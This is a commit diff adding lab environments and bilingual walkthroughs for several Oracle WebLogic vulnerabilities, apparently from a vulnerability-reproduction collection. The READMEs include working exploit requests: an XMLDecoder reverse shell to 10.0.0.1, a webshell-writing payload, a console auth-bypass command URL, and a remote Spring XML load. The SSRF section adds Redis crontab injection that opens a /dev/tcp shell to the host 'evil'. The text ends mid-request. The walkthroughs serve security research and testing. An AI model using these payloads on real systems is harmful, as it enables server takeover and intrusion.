first commit

weblogic/CVE-2017-10271/README.md

@@ -0,0 +1,99 @@
+# Weblogic < 10.3.6 'wls-wsat' XMLDecoder Deserialization Remote Command Execution (CVE-2017-10271)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Oracle Weblogic Server is a popular enterprise application server that provides a wide range of features for building and deploying enterprise applications.
+
+The WLS Security component of Weblogic provides webservice services, which uses XMLDecoder to parse XML data submitted by users. During the parsing process, a deserialization vulnerability occurs, allowing arbitrary command execution.
+
+Reference links:
+
+- https://www.exploit-db.com/exploits/43458/
+- https://paper.seebug.org/487/
+- https://github.com/Tom4t0/Tom4t0.github.io/blob/master/_posts/2017-12-22-WebLogic%20WLS-WebServices组件反序列化漏洞分析.md
+- http://blog.diniscruz.com/2013/08/using-xmldecoder-to-execute-server-side.html
+
+## Environment Setup
+
+Start a vulnerable Weblogic server 10.3.6.0-2017:
+
+```
+docker compose up -d
+```
+
+Wait for a while, visit `http://your-ip:7001/` and you will see a 404 page, indicating that weblogic has started successfully.
+
+## Vulnerability Reproduce
+
+Send the following request (note that the reverse shell command needs to be encoded, otherwise XML parsing will result in format errors):
+
+```
+POST /wls-wsat/CoordinatorPortType HTTP/1.1
+Host: your-ip:7001
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
+Connection: close
+Content-Type: text/xml
+Content-Length: 633
+
+<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header>
+<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
+<java version="1.4.0" class="java.beans.XMLDecoder">
+<void class="java.lang.ProcessBuilder">
+<array class="java.lang.String" length="3">
+<void index="0">
+<string>/bin/bash</string>
+</void>
+<void index="1">
+<string>-c</string>
+</void>
+<void index="2">
+<string>bash -i &gt;&amp; /dev/tcp/10.0.0.1/21 0&gt;&amp;1</string>
+</void>
+</array>
+<void method="start"/></void>
+</java>
+</work:WorkContext>
+</soapenv:Header>
+<soapenv:Body/>
+</soapenv:Envelope>
+```
+
+Successfully obtained shell:
+
+![](1.png)
+
+Write webshell (access: `http://your-ip:7001/bea_wls_internal/test.jsp`):
+
+```
+POST /wls-wsat/CoordinatorPortType HTTP/1.1
+Host: your-ip:7001
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
+Connection: close
+Content-Type: text/xml
+Content-Length: 638
+
+<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
+    <soapenv:Header>
+    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
+    <java><java version="1.4.0" class="java.beans.XMLDecoder">
+    <object class="java.io.PrintWriter"> 
+    <string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/test.jsp</string>
+    <void method="println"><string>
+    <![CDATA[
+<% out.print("test"); %>
+    ]]>
+    </string>
+    </void>
+    <void method="close"/>
+    </object></java></java>
+    </work:WorkContext>
+    </soapenv:Header>
+    <soapenv:Body/>
+</soapenv:Envelope>
+```

weblogic/CVE-2017-10271/README.zh-cn.md

@@ -0,0 +1,97 @@
+# Weblogic < 10.3.6 'wls-wsat' XMLDecoder 反序列化漏洞（CVE-2017-10271）
+
+Oracle Weblogic 是 Oracle 公司开发的一款企业级应用服务器，提供了广泛的企业级应用开发和部署功能。
+
+Weblogic的WLS Security组件对外提供webservice服务，其中使用了XMLDecoder来解析用户传入的XML数据，在解析的过程中出现反序列化漏洞，导致可执行任意命令。
+
+参考链接：
+
+- https://www.exploit-db.com/exploits/43458/
+- https://paper.seebug.org/487/
+- https://github.com/Tom4t0/Tom4t0.github.io/blob/master/_posts/2017-12-22-WebLogic%20WLS-WebServices组件反序列化漏洞分析.md
+- http://blog.diniscruz.com/2013/08/using-xmldecoder-to-execute-server-side.html
+
+## 环境搭建
+
+启动测试环境：
+
+```
+docker compose up -d
+```
+
+等待一段时间，访问`http://your-ip:7001/`即可看到一个404页面，说明weblogic已成功启动。
+
+## 漏洞复现
+
+发送如下数据包（注意其中反弹shell的语句，需要进行编码，否则解析XML的时候将出现格式错误）：
+
+```
+POST /wls-wsat/CoordinatorPortType HTTP/1.1
+Host: your-ip:7001
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
+Connection: close
+Content-Type: text/xml
+Content-Length: 633
+
+<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header>
+<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
+<java version="1.4.0" class="java.beans.XMLDecoder">
+<void class="java.lang.ProcessBuilder">
+<array class="java.lang.String" length="3">
+<void index="0">
+<string>/bin/bash</string>
+</void>
+<void index="1">
+<string>-c</string>
+</void>
+<void index="2">
+<string>bash -i &gt;&amp; /dev/tcp/10.0.0.1/21 0&gt;&amp;1</string>
+</void>
+</array>
+<void method="start"/></void>
+</java>
+</work:WorkContext>
+</soapenv:Header>
+<soapenv:Body/>
+</soapenv:Envelope>
+```
+
+成功获取shell：
+
+![](1.png)
+
+写入webshell（访问：`http://your-ip:7001/bea_wls_internal/test.jsp`）：
+
+```
+POST /wls-wsat/CoordinatorPortType HTTP/1.1
+Host: your-ip:7001
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
+Connection: close
+Content-Type: text/xml
+Content-Length: 638
+
+<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
+    <soapenv:Header>
+    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
+    <java><java version="1.4.0" class="java.beans.XMLDecoder">
+    <object class="java.io.PrintWriter"> 
+    <string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/test.jsp</string>
+    <void method="println"><string>
+    <![CDATA[
+<% out.print("test"); %>
+    ]]>
+    </string>
+    </void>
+    <void method="close"/>
+    </object></java></java>
+    </work:WorkContext>
+    </soapenv:Header>
+    <soapenv:Body/>
+</soapenv:Envelope>
+```

weblogic/CVE-2017-10271/docker-compose.yml

@@ -0,0 +1,5 @@
+services:
+ weblogic:
+   image: vulhub/weblogic:10.3.6.0-2017
+   ports:
+    - "7001:7001"

weblogic/CVE-2018-2628/README.md

@@ -0,0 +1,45 @@
+# Weblogic WLS Core Components Deserialization Remote Command Execution (CVE-2018-2628)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Oracle Weblogic Server is a popular enterprise application server that provides a wide range of features for building and deploying enterprise applications.
+
+In Oracle's April 2018 patch, a deserialization vulnerability in Weblogic Server WLS Core Components was fixed (CVE-2018-2628). This vulnerability can be triggered through the T3 protocol, allowing unauthorized users to execute arbitrary commands on the remote server.
+
+Reference links:
+
+- http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html
+- http://mp.weixin.qq.com/s/nYY4zg2m2xsqT0GXa9pMGA
+- https://github.com/tdy218/ysoserial-cve-2018-2628
+
+## Environment Setup
+
+Execute the following command to start Weblogic 10.3.6.0:
+
+```
+docker compose up -d
+```
+
+Wait for the environment to start (depending on your machine, it might take a while), then visit `http://your-ip:7001/console` to initialize the environment.
+
+## Vulnerability Reproduce
+
+First, download ysoserial and start a JRMP Server:
+
+```
+java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener [listen port] CommonsCollections1 [command]
+```
+
+Where `[command]` is the command you want to execute, and `[listen port]` is the port that the JRMP Server listens on.
+
+Then, use the [exploit.py](https://www.exploit-db.com/exploits/44553) script to send a packet to the target Weblogic (`http://your-ip:7001`):
+
+```
+python exploit.py [victim ip] [victim port] [path to ysoserial] [JRMPListener ip] [JRMPListener port] [JRMPClient]
+```
+
+Where `[victim ip]` and `[victim port]` are the IP and port of the target weblogic, `[path to ysoserial]` is the local path to ysoserial, `[JRMPListener ip]` and `[JRMPListener port]` are the IP address and port of the JRMP Server started in step 1. `[JRMPClient]` is the class to execute JRMPClient, the optional values are `JRMPClient` or `JRMPClient2`.
+
+After exploit.py is executed, run `docker compose exec weblogic bash` to enter the container, and you can see that /tmp/success has been successfully created.
+
+![](1.png)

weblogic/CVE-2018-2628/README.zh-cn.md

@@ -0,0 +1,41 @@
+# Weblogic WLS Core Components 反序列化命令执行漏洞（CVE-2018-2628）
+
+Oracle 2018年4月补丁中，修复了Weblogic Server WLS Core Components中出现的一个反序列化漏洞（CVE-2018-2628），该漏洞通过T3协议触发，可导致未授权的用户在远程服务器执行任意命令。
+
+参考链接：
+
+- http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html
+- http://mp.weixin.qq.com/s/nYY4zg2m2xsqT0GXa9pMGA
+- https://github.com/tdy218/ysoserial-cve-2018-2628
+
+## 漏洞环境
+
+执行如下命令启动Weblogic 10.3.6.0：
+
+```
+docker compose up -d
+```
+
+等待环境启动（环境差异，有的机器可能等待的时间比较久），访问`http://your-ip:7001/console`，初始化整个环境。
+
+## 漏洞复现
+
+首先下载ysoserial，并启动一个JRMP Server：
+
+```
+java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener [listen port] CommonsCollections1 [command]
+```
+
+其中，`[command]`即为我想执行的命令，而`[listen port]`是JRMP Server监听的端口。
+
+然后，使用[exploit.py](https://www.exploit-db.com/exploits/44553)脚本，向目标Weblogic（`http://your-ip:7001`）发送数据包：
+
+```
+python exploit.py [victim ip] [victim port] [path to ysoserial] [JRMPListener ip] [JRMPListener port] [JRMPClient]
+```
+
+其中，`[victim ip]`和`[victim port]`是目标weblogic的IP和端口，`[path to ysoserial]`是本地ysoserial的路径，`[JRMPListener ip]`和`[JRMPListener port]`第一步中启动JRMP Server的IP地址和端口。`[JRMPClient]`是执行JRMPClient的类，可选的值是`JRMPClient`或`JRMPClient2`。
+
+exploit.py执行完成后，执行`docker compose exec weblogic bash`进入容器中，可见/tmp/success已成功创建。
+
+![](1.png)

weblogic/CVE-2018-2628/docker-compose.yml

@@ -0,0 +1,5 @@
+services:
+ weblogic:
+   image: vulhub/weblogic:10.3.6.0-2017
+   ports:
+    - "7001:7001"

weblogic/CVE-2018-2894/README.md

@@ -0,0 +1,49 @@
+# Weblogic Arbitrary File Upload Vulnerability (CVE-2018-2894)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Oracle Weblogic Server is a popular enterprise application server that provides a wide range of features for building and deploying enterprise applications.
+
+In Oracle's July 2018 update, a vulnerability in the Weblogic Web Service Test Page was fixed that allowed arbitrary file upload. The Web Service Test Page is disabled by default in "Production Mode", so this vulnerability has certain limitations.
+
+By exploiting this vulnerability, attackers can upload arbitrary JSP files and gain server access.
+
+Reference links:
+
+- http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html
+- https://mp.weixin.qq.com/s/y5JGmM-aNaHcs_6P9a-gRQ
+- https://xz.aliyun.com/t/2458
+
+## Environment Setup
+
+Execute the following command to start Weblogic 12.2.1.3:
+
+```
+docker compose up -d
+```
+
+After the environment starts, visit `http://your-ip:7001/console` to see the backend login page.
+
+Execute `docker compose logs | grep password` to view the administrator password. The administrator username is `weblogic`.
+
+After logging into the backend, click on the `base_domain` configuration, and in "Advanced" enable the "Enable Web Service Test Page" option:
+
+![](img/1.png)
+
+## Vulnerability Reproduce
+
+As a attacker, visit `http://your-ip:7001/ws_utc/config.do` and set the Work Home Dir to `/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css`. We set the directory to the static file CSS directory of the `ws_utc` application because this directory can be accessed without permissions, which is crucial.
+
+![](img/2.png)
+
+Then click on Security -> Add, and upload a webshell:
+
+![](img/3.png)
+
+After uploading, check the returned data packet which contains a timestamp:
+
+![](img/4.png)
+
+Then visit `http://your-ip:7001/ws_utc/css/config/keystore/[timestamp]_[filename]` to execute the webshell:
+
+![](img/5.png)

weblogic/CVE-2018-2894/README.zh-cn.md

@@ -0,0 +1,45 @@
+# Weblogic 任意文件上传漏洞（CVE-2018-2894）
+
+Oracle 7月更新中，修复了Weblogic Web Service Test Page中一处任意文件上传漏洞，Web Service Test Page 在"生产模式"下默认不开启，所以该漏洞有一定限制。
+
+利用该漏洞，可以上传任意jsp文件，进而获取服务器权限。
+
+参考链接：
+
+- http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html
+- https://mp.weixin.qq.com/s/y5JGmM-aNaHcs_6P9a-gRQ
+- https://xz.aliyun.com/t/2458
+
+## 漏洞环境
+
+执行如下命令，启动weblogic 12.2.1.3：
+
+```
+docker compose up -d
+```
+
+环境启动后，访问`http://your-ip:7001/console`，即可看到后台登录页面。
+
+执行`docker compose logs | grep password`可查看管理员密码，管理员用户名为`weblogic`。
+
+登录后台页面，点击`base_domain`的配置，在"高级"中开启"启用 Web 服务测试页"选项：
+
+![](img/1.png)
+
+## 漏洞复现
+
+访问`http://your-ip:7001/ws_utc/config.do`，设置Work Home Dir为`/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css`。我将目录设置为`ws_utc`应用的静态文件css目录，访问这个目录是无需权限的，这一点很重要。
+
+![](img/2.png)
+
+然后点击安全 -> 增加，然后上传webshell：
+
+![](img/3.png)
+
+上传后，查看返回的数据包，其中有时间戳：
+
+![](img/4.png)
+
+然后访问`http://your-ip:7001/ws_utc/css/config/keystore/[时间戳]_[文件名]`，即可执行webshell：
+
+![](img/5.png)

weblogic/CVE-2018-2894/docker-compose.yml

@@ -0,0 +1,5 @@
+services:
+ weblogic:
+   image: vulhub/weblogic:12.2.1.3-2018
+   ports:
+    - "7001:7001"

weblogic/CVE-2020-14882/README.md

@@ -0,0 +1,83 @@
+# Weblogic Pre-Auth Remote Command Execution (CVE-2020-14882, CVE-2020-14883)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Oracle WebLogic Server is the industry leading application server for building enterprise applications using Java EE standards, and deploying them on a reliable, scalable runtime with low cost of ownership.
+
+In [Oracle Critical Patch Update Advisory - October 2020](https://www.oracle.com/security-alerts/cpuoct2020traditional.html), Oracle fixed two security vulnerabilities submitted by security researcher @Voidfyoo from Chaitin Tech, CVE-2020-14882 and CVE-2020-14883.
+
+CVE-2020-14882 allows remote users to bypass the authentication in administrator console component, and CVE-2020-14883 allows authencated user to execute any command on administrator console component. Using a chain of these two vulnerabilities, unauthenticated remote attacker can execute arbitrary commands on the Oracle WebLogic server over HTTP and take complete control of the host.
+
+References:
+
+- https://www.oracle.com/security-alerts/cpuoct2020traditional.html
+- https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf
+
+## Environment Setup
+
+Start a Weblogic server 12.2.1.3 by executing the following command:
+
+```
+docker compose up -d
+```
+
+After the startup is complete, visit `http://your-ip:7001/console` to view the administrator console login page.
+
+## Exploit
+
+Using this URL to bypass the authentication of Console component:
+
+```
+http://your-ip:7001/console/css/%252e%252e%252fconsole.portal
+```
+
+![](1.png)
+
+At this moment, you don't have permission to upload a webshell:
+
+![](2.png)
+
+The second vulnerability, CVE-2020-14883, there are two ways to exploit, one is through `com.tangosol.coherence.mvel2.sh.ShellSession`, and the other is through `com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext`.
+
+Visit the following URL to chain 2 vulnerabilities and execute commands from `com.tangosol.coherence.mvel2.sh.ShellSession`:
+
+```
+http://your-ip:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('touch%20/tmp/success1');")
+```
+
+`touch /tmp/success1` has been successfully executed inside the container:
+
+![](3.png)
+
+This method of exploit can only be used in Weblogic 12.2.1 and above, because 10.3.6 doesn't have the class `com.tangosol.coherence.mvel2.sh.ShellSession`.
+
+`com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext` is a more common exploit, which was first introduced in CVE-2019-2725 and is useable for any Weblogic versions.
+
+To exploit the `FileSystemXmlApplicationContext`, you need to make a crafted XML file and serve it on a server that Weblogic can access, such as `http://example.com/rce.xml`:
+
+```xml
+<?xml version="1.0" encoding="UTF-8" ?>
+<beans xmlns="http://www.springframework.org/schema/beans"
+   xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+   xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
+    <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
+        <constructor-arg>
+          <list>
+            <value>bash</value>
+            <value>-c</value>
+            <value><![CDATA[touch /tmp/success2]]></value>
+          </list>
+        </constructor-arg>
+    </bean>
+</beans>
+```
+
+Then through the following URL, Weblogic would load this XML and execute the commands in it:
+
+```
+http://your-ip:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://example.com/rce.xml")
+```
+
+![](4.png)
+
+The shortcomings of this exploit is that, it requires the Weblogic server to be able to access the malicious XML.

weblogic/CVE-2020-14882/README.zh-cn.md

@@ -0,0 +1,79 @@
+# Weblogic 管理控制台未授权远程命令执行漏洞（CVE-2020-14882，CVE-2020-14883）
+
+Weblogic是Oracle公司推出的J2EE应用服务器。在2020年10月的更新中，Oracle官方修复了两个长亭科技安全研究员@voidfyoo 提交的安全漏洞，分别是CVE-2020-14882和CVE-2020-14883。
+
+CVE-2020-14882允许未授权的用户绕过管理控制台的权限验证访问后台，CVE-2020-14883允许后台任意用户通过HTTP协议执行任意命令。使用这两个漏洞组成的利用链，可通过一个GET请求在远程Weblogic服务器上以未授权的任意用户身份执行命令。
+
+参考链接：
+
+- https://www.oracle.com/security-alerts/cpuoct2020traditional.html
+- https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf
+
+## 漏洞环境
+
+执行如下命令启动一个Weblogic 12.2.1.3版本的服务器：
+
+```
+docker compose up -d
+```
+
+启动完成后，访问`http://your-ip:7001/console`即可查看到后台登录页面。
+
+## 漏洞复现
+
+首先测试权限绕过漏洞（CVE-2020-14882），访问以下URL，即可未授权访问到管理后台页面：
+
+```
+http://your-ip:7001/console/css/%252e%252e%252fconsole.portal
+```
+
+![](1.png)
+
+访问后台后，可以发现我们现在是低权限的用户，无法安装应用，所以也无法直接执行任意代码：
+
+![](2.png)
+
+此时需要利用到第二个漏洞CVE-2020-14883。这个漏洞的利用方式有两种，一是通过`com.tangosol.coherence.mvel2.sh.ShellSession`，二是通过`com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext`。
+
+直接访问如下URL，即可利用`com.tangosol.coherence.mvel2.sh.ShellSession`执行命令：
+
+```
+http://your-ip:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('touch%20/tmp/success1');")
+```
+
+进入容器，可以发现`touch /tmp/success1`已成功执行：
+
+![](3.png)
+
+这个利用方法只能在Weblogic 12.2.1以上版本利用，因为10.3.6并不存在`com.tangosol.coherence.mvel2.sh.ShellSession`类。
+
+`com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext`是一种更为通杀的方法，最早在CVE-2019-2725被提出，对于所有Weblogic版本均有效。
+
+首先，我们需要构造一个XML文件，并将其保存在Weblogic可以访问到的服务器上，如`http://example.com/rce.xml`：
+
+```xml
+<?xml version="1.0" encoding="UTF-8" ?>
+<beans xmlns="http://www.springframework.org/schema/beans"
+   xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+   xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
+    <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
+        <constructor-arg>
+          <list>
+            <value>bash</value>
+            <value>-c</value>
+            <value><![CDATA[touch /tmp/success2]]></value>
+          </list>
+        </constructor-arg>
+    </bean>
+</beans>
+```
+
+然后通过如下URL，即可让Weblogic加载这个XML，并执行其中的命令：
+
+```
+http://your-ip:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://example.com/rce.xml")
+```
+
+![](4.png)
+
+这个利用方法也有自己的缺点，就是需要Weblogic的服务器能够访问到恶意XML。

weblogic/CVE-2020-14882/docker-compose.yml

@@ -0,0 +1,5 @@
+services:
+ weblogic:
+   image: vulhub/weblogic:12.2.1.3-2018
+   ports:
+    - "7001:7001"

weblogic/CVE-2023-21839/README.md

@@ -0,0 +1,37 @@
+# WebLogic Pre-Auth Remote Command Execution (CVE-2023-21839)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Oracle WebLogic Server is a leading Java EE application server widely used in enterprise environments.
+
+In the [Oracle Critical Patch Update Advisory - January 2023](https://www.oracle.com/security-alerts/cpujan2023.html), Oracle fixed a critical vulnerability (CVE-2023-21839) affecting WebLogic Server versions 12.2.1.3.0, 12.2.1.4.0, and 14.1.1.0.0.
+
+CVE-2023-21839 allows unauthenticated remote attackers to perform JNDI lookup operations via the T3 or IIOP protocol without authorization. If the JDK version is too low or there are available deserialization gadgets (javaSerializedData) on the server, this can lead to remote code execution.
+
+References:
+
+- <https://www.oracle.com/security-alerts/cpujan2023.html>
+- <https://nvd.nist.gov/vuln/detail/CVE-2023-21839>
+- <https://github.com/houqe/POC_CVE-2023-21839>
+
+## Environment Setup
+
+Start a Weblogic server 12.2.1.3 by executing the following command:
+
+```
+docker compose up -d
+```
+
+After the server starts, visit `http://your-ip:7001/console` to access the WebLogic admin console login page.
+
+## Vulnerability Reproduction
+
+You can use the public exploit from <https://github.com/houqe/POC_CVE-2023-21839> to reproduce the vulnerability.
+
+```shell
+python CVE-2023-21839.py -ip 192.168.25.129 -p 7001 -l ldap://craft.ldap.tld/test
+```
+
+If the exploit is successful, you will see DNS queries or LDAP requests from the target server, as shown below:
+
+![](1.png)

weblogic/CVE-2023-21839/README.zh-cn.md

@@ -0,0 +1,35 @@
+# WebLogic未授权远程代码执行漏洞 (CVE-2023-21839)
+
+Oracle WebLogic Server是业界广泛使用的Java EE企业级应用服务器。
+
+在[Oracle 2023年1月安全公告](https://www.oracle.com/security-alerts/cpujan2023.html)中，Oracle修复了影响WebLogic Server 12.2.1.3.0、12.2.1.4.0和14.1.1.0.0版本的严重安全漏洞CVE-2023-21839。
+
+该漏洞允许未授权远程攻击者通过T3或IIOP协议发起JNDI lookup操作。如果JDK版本过低或本地存在可用的反序列化gadget（javaSerializedData），攻击者可进一步实现远程代码执行（RCE）。
+
+参考链接：
+
+- <https://www.oracle.com/security-alerts/cpujan2023.html>
+- <https://nvd.nist.gov/vuln/detail/CVE-2023-21839>
+- <https://github.com/houqe/POC_CVE-2023-21839>
+
+## 环境设置
+
+执行以下命令启动WebLogic Server 12.2.1.3漏洞环境：
+
+```
+docker compose up -d
+```
+
+启动完成后，访问`http://your-ip:7001/console`可以看到WebLogic管理控制台登录页。
+
+## 漏洞复现
+
+你可以使用公开的POC工具<https://github.com/houqe/POC_CVE-2023-21839>进行漏洞复现。
+
+```shell
+python CVE-2023-21839.py -ip 192.168.25.129 -p 7001 -l ldap://craft.ldap.tld/test
+```
+
+漏洞利用成功后，可在DNSLog平台或LDAP服务端看到来自目标服务器的请求，如下图所示：
+
+![](1.png)

weblogic/CVE-2023-21839/docker-compose.yml

@@ -0,0 +1,5 @@
+services:
+ weblogic:
+   image: vulhub/weblogic:12.2.1.3-2018
+   ports:
+    - "7001:7001"

weblogic/ssrf/README.md

@@ -0,0 +1,95 @@
+# Weblogic UDDI Explorer Server-Side Request Forgery (SSRF)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Oracle WebLogic Server is a Java-based enterprise application server. A Server-Side Request Forgery (SSRF) vulnerability exists in WebLogic's UDDI Explorer application, which allows attackers to send arbitrary HTTP requests through the server, potentially leading to internal network scanning or attacks against vulnerable internal services like Redis.
+
+References:
+
+- <https://github.com/vulhub/vulhub/tree/master/weblogic/ssrf>
+- <https://foxglovesecurity.com/2015/11/06/what-is-server-side-request-forgery-ssrf/>
+- <https://www.blackhat.com/docs/us-17/thursday/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf>
+
+## Environment Setup
+
+Execute the following command to start a WebLogic server:
+
+```
+docker compose up -d
+```
+
+After the server starts, visit `http://your-ip:7001/uddiexplorer/` to access the UDDI Explorer application. No authentication is required.
+
+## Vulnerability Reproduction
+
+The SSRF vulnerability exists in the SearchPublicRegistries.jsp page. Using Burp Suite, we can send a request to `http://your-ip:7001/uddiexplorer/SearchPublicRegistries.jsp` to test this vulnerability.
+
+First, we can try accessing an internal service like `http://127.0.0.1:7001`:
+
+```
+GET /uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:7001 HTTP/1.1
+Host: localhost
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
+Connection: close
+
+```
+
+When accessing an available port, you will receive an error response with a status code. For non-HTTP protocols, you'll get a "did not have a valid SOAP content-type" error.
+
+![](1.png)
+
+When accessing a non-existent port, the response will be "could not connect over HTTP to server".
+
+![](2.png)
+
+By analyzing these different error messages, we can effectively scan the internal network.
+
+### Redis Shell Exploitation
+
+A notable characteristic of WebLogic's SSRF vulnerability is that despite being a GET request, we can inject newline characters using `%0a%0d`. Since services like Redis use newlines to separate commands, we can leverage this to attack internal Redis servers.
+
+First, we scan the internal network for Redis servers (Docker networks typically use 172.* subnets) and find that `172.18.0.2:6379` is accessible:
+
+![](3.png)
+
+We can then send three Redis commands to write a shell script into `/etc/crontab`:
+
+```
+set 1 "\n\n\n\n0-59 0-23 1-31 1-12 0-6 root bash -c 'sh -i >& /dev/tcp/evil/21 0>&1'\n\n\n\n"
+config set dir /etc/
+config set dbfilename crontab
+save
+```
+
+URL encode these commands:
+
+```
+set%201%20%22%5Cn%5Cn%5Cn%5Cn0-59%200-23%201-31%201-12%200-6%20root%20bash%20-c%20'sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2Fevil%2F21%200%3E%261'%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave
+```
+
+Send the encoded payload through the SSRF vulnerability:
+
+```
+GET /uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://172.19.0.2:6379/test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn0-59%200-23%201-31%201-12%200-6%20root%20bash%20-c%20%27sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2Fevil%2F21%200%3E%261%27%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aaaa HTTP/1.1
+Host: localhost
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
+Connection: close
+
+```
+
+![](4.png)
+
+Successfully obtaining a reverse shell:
+
+![](5.png)
+
+Note that there are several locations where cron jobs can be exploited:
+
+- `/etc/crontab` (default system crontab)
+- `/etc/cron.d/*` (system cron job directory)
+- `/var/spool/cron/root` (CentOS root user cron file)
+- `/var/spool/cron/crontabs/root` (Debian root user cron file)

weblogic/ssrf/README.zh-cn.md

@@ -0,0 +1,93 @@
+# Weblogic UDDI Explorer SSRF漏洞
+
+Oracle WebLogic Server是一个基于Java的企业级应用服务器。在WebLogic的UDDI Explorer应用中存在一个服务器端请求伪造（SSRF）漏洞，攻击者可以通过该漏洞发送任意HTTP请求，进而可能导致内网探测或攻击内网中的脆弱服务，如Redis等。
+
+参考链接：
+
+- <https://github.com/vulhub/vulhub/tree/master/weblogic/ssrf>
+- <https://foxglovesecurity.com/2015/11/06/what-is-server-side-request-forgery-ssrf/>
+- <https://www.blackhat.com/docs/us-17/thursday/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf>
+
+## 环境搭建
+
+执行如下命令启动WebLogic服务器：
+
+```
+docker compose up -d
+```
+
+服务启动后，访问`http://your-ip:7001/uddiexplorer/`即可查看UDDI Explorer应用，无需登录认证。
+
+## 漏洞复现
+
+SSRF漏洞存在于SearchPublicRegistries.jsp页面中。我们可以使用Burp Suite向`http://your-ip:7001/uddiexplorer/SearchPublicRegistries.jsp`发送请求来测试该漏洞。
+
+首先，我们尝试访问一个内部服务，如`http://127.0.0.1:7001`：
+
+```
+GET /uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:7001 HTTP/1.1
+Host: localhost
+Accept: */*
+Accept-Language: en
